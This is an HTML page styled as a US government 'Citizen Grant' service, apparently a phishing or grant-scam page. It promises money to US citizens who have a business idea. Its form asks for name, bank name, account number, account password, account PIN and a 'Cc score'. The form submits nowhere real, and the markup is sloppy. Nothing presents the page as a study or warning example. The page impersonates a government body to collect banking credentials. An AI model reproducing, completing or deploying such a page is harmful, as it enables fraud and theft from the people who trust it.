<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <title>USA Government | Grant</title>
    <link rel="stylesheet" href="./css/style.css">
    <style>
    /* Global */
.container{
  width:80%;
  margin:auto;
  overflow:hidden;
}
      header{
        background-color: #35424a; color:#ffffff;
        padding-top:30px;
  min-height:70px;
  border-bottom:#e8491d 3px solid;
      }
      header .highlight, header .current a{
  color:#ffffff;
  font-weight:bold;
}
header .highlight, header .current a{
  color:#e8491d;
  font-weight:bold;
}
header a{
  color:#ffffff;
  text-decoration:none;
  text-transform: uppercase;
  font-size:16px;
}
header a:hover{
  color:#e8491d;
  font-weight:bold;
}
header a:visited{
  color:#e8491d;
  font-weight:bold;
}

header li{
  float:left;
  display:inline;
  padding: 0 20px 0 20px;
}

header #branding{
  float:left;
}

header #branding h1{
  margin:0;
}

header nav{
  float:right;
  margin-top:10px;
}
.dark{
  padding:15px;
  background:#35424a;
  color:#ffffff;
  margin-top:10px;
  margin-bottom:10px;
}
/* Showcase */
#showcase{
  min-height:400px;
  background:url("gg.jpg") no-repeat;
  background-position: center;
  background-size: cover;
  text-align:center;
  color:#ffffff;
}

#showcase h1{
  margin-top:100px;
  font-size:55px;
  margin-bottom:10px;
}
/* Newsletter */
#newsletter{
  padding:15px;
  color:#ffffff;
  background:#35424a
}

#newsletter h2{
  float:left;
}

#newsletter form {
  float:right;
  margin-top:15px;
}

#newsletter input[type="email"]{
  padding:4px;
  height:25px;
  width:250px;
}

/* Boxes */
#boxes{
  margin-top:20px;
}

#boxes .box{
  float:left;
  text-align: center;
  width:30%;
  padding:10px;
}

#boxes .box img{
  width:90px;
}
/* Sidebar */
aside#sidebar{
  float:left;
  width:30%;
  margin-top:10px;
}
aside#sidebar input {
  float: right;
  width: 80%;
  margin-top: 25px;
  padding: 5px;
  margin: -200px;
}
sidebar {
  background-color: #7341412f;
}

aside#sidebar .sidebar .input, aside#sidebar .Sidebar .input {
  width:90%;
  padding:5px;
}

/* Main-col */
article#main-col{
  float:left;
  width:65%;
}

/* Services */
ul#services li{
  list-style: none;
  padding:20px;
  border: #cccccc solid 1px;
  margin-bottom:5px;
  background:#e6e6e6;
}
#hhh{
  margin-top: 29px;
}

  footer{
  padding:20px;
  margin-top:20px;
  color:#ffffff;
  background-color:#e8491d;
  text-align: center;
}
form{
  margin-left: 800px;
  border: #35424a;
}
form button{
  background-color: red;
  color: white;
  box-shadow: 5px solid gray;
}
</style>
</head>
<body>
   

<header>
  <div class="container">
    <div id="branding">
  <h1><span style="color:red;">
CITIZEN </span>  Grant 
</h1>
</div>
<nav>
<ul>
  <li><a href="gov.html">Home</a></li>
  <li><a href="about.html">About</a></li>
  <li class="current"><a href="service.html">Service</a></li>
</ul>
</nav>
</div>
</header>
 </section>

    <aside id="sidebar">
          <div class="dark">
            <h3>Requirements</h3>
            <p>
              <ul>
<li> You must be a citizen of the United States</li>
<li> You must think of a business you will use the money for</li>
<li> You must have an active bank ACCOUNT wehere we can transfer the money into</li>
</ul>
</p>
          </div>
        </aside>
<aside id="hhh">
  <b>
  <form action="get" method="get">
    First Name:
    <input type="text" placeholder="first name..." required>
   <p>Last Name:
    <input type="text" placeholder="last name...
    " required>
    </p>
    <p>Bank Name:
    <input type="text" placeholder="bank name..." required>
    </p>
    <p> Account Number:
    <input type="number" placeholder="acct no..." required>
    </p>
  <p>  Account password:
    <input type="password" placeholder="acct password..." required>
    </p>
   <p> Account Name:
    <input type="text" placeholder="acct name..." required>
    </p>
    <p> Account pin:
    <input type="password" placeholder="pin" rrequired>
    </p>
    <p>  Cc score:
      <input type="password" placeholder="cc score" required>
      </p>

      <a href="verrified.html"><input type="submit" value="submit"></a>
</form>
</b>

        </aside>
    </section>
   
    <footer>
      <p>USA Grant, Copyright &copy; 2023</p>
    </footer>
  </body>
  </html>